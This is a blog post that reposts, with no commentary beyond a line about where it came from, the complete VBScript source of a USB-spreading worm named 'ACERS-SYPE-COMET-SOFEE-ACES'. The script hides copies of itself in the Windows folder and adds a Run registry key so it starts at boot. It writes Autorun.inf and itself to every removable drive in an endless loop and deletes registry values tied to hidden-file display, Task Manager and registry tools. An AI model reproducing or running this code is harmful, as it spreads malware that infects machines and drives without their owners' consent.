This page has been viewed this much;

Monday, February 28, 2011

ACERS-SYPE-COMET-SOFEE-ACES virus

I got this code from this titled virus long time ago and it was stuck on my previous blogger account so i couldn't edit it.

Anyway here is the code reposted from Pepper ViewMaster which is also me.


On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")

Set myFile = fso.CreateTextFile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Command=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39
End If
Next

With wscr
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
End With

If tf <> win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
 
 

Posted by at 1 comment:
Subscribe to: Posts (Atom)